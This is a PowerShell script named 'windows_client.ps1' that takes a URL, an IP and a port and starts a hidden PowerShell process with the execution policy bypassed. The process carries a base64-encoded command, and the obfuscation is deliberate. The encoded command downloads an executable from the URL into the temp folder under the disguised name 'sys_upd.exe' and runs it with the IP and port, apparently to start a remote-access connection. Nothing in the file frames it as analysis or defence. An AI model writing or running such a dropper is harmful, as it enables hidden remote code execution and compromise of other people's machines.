param(
    [string]$URL,
    [string]$IP,
    [string]$PORT
)

if (-not $URL -or -not $IP -or -not $PORT) {
    Write-Host "Usage: .\windows_client.ps1 <URL> <IP> <PORT>" -ForegroundColor Yellow
    exit
}

powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -EncodedCommand cABhAHIAYQBtACgAJAB1ACwAIAAkAGkALAAgACQAcAApADsAIABbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAYwB1AHIAaQB0AHkAUAByAG8AdABvAGMAbwBsACAAPQAgAFsATgBlAHQALgBTAGUAYwB1AHIAaQB0AHkAUAByAG8AdABvAGMAbwBsAFQAeQBwAGUAXQA6ADoAVABsAHMAMQAyADsAIAAkAGYAPQAiACQAZQBuAHYAOgBUAEUATQBQAFwAcwB5AHMAXwB1AHAAZAAuAGUAeABlACIAOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJAB1ACwAIAAkAGYAKQA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACQAZgAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIAAiACQAaQAgACQAcAAiAA== -Args $URL $IP $PORT
